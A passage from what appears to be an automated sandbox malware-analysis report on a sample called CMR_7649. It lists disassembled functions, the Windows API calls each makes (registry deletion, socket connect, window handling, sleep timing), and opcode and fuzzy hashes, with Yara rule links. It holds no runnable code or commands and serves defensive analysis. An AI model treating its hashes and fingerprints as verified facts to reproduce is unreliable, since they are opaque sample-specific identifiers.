                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID:
                                                • API String ID: 327565842-0
                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String
                                                • String ID:
                                                • API String ID: 2832842796-0
                                                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Enum$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 2095303065-0
                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: RectWindow
                                                • String ID:
                                                • API String ID: 861336768-0
                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32 ref: 00449598
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                • _wcslen.LIBCMT ref: 0044960D
                                                • _wcslen.LIBCMT ref: 0044961A
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 1856069659-0
                                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                • TrackPopupMenuEx.USER32(00A063D0,00000000,00000000,?,?,00000000), ref: 00447991
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CursorMenuPopupTrack$Proc
                                                • String ID:
                                                • API String ID: 1300944170-0
                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 1822080540-0
                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 659298297-0
                                                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(00A01B20,000000F1,00000000,00000000), ref: 00440E6E
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(00A01B20,000000F1,00000001,00000000), ref: 00440E9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$EnableMessageSend$LongShow
                                                • String ID:
                                                • API String ID: 142311417-0
                                                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                • _wcslen.LIBCMT ref: 004458FB
                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                • String ID:
                                                • API String ID: 3087257052-0
                                                • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 245547762-0
                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                • BeginPath.GDI32(?), ref: 0044723D
                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Object$Select$BeginCreateDeletePath
                                                • String ID:
                                                • API String ID: 2338827641-0
                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
